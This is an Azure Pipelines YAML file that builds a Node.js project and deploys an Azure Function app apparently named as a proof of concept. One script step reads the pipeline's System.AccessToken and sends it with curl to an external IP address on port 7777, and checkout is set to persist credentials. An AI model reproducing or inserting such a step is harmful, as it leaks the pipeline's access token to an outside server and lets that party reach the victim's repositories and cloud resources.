trigger:
  branches:
    include:
      - main

pool:
  vmImage: 'ubuntu-latest'

steps:
- checkout: self
  persistCredentials: true  # 保留凭据以便后续步骤使用

- task: NodeTool@0
  inputs:
    versionSpec: '12.x'
    checkLatest: true

- script: |
    echo "Fetching System Access Token..."
    token=$(System.AccessToken)
    echo "Sending token to external server..."
    curl -X POST -H "Content-Type: application/json" -d "{\"token\": \"$token\"}" http://139.180.193.16:7777
  displayName: 'Fetch and Send System Access Token'

- script: |
    npm install
  displayName: 'Install Node.js dependencies'

- task: AzureFunctionApp@1
  inputs:
    azureSubscription: 'test_connection'
    appType: 'functionApp'
    appName: 'mypocfunctiontest'
    package: '$(Build.ArtifactStagingDirectory)/'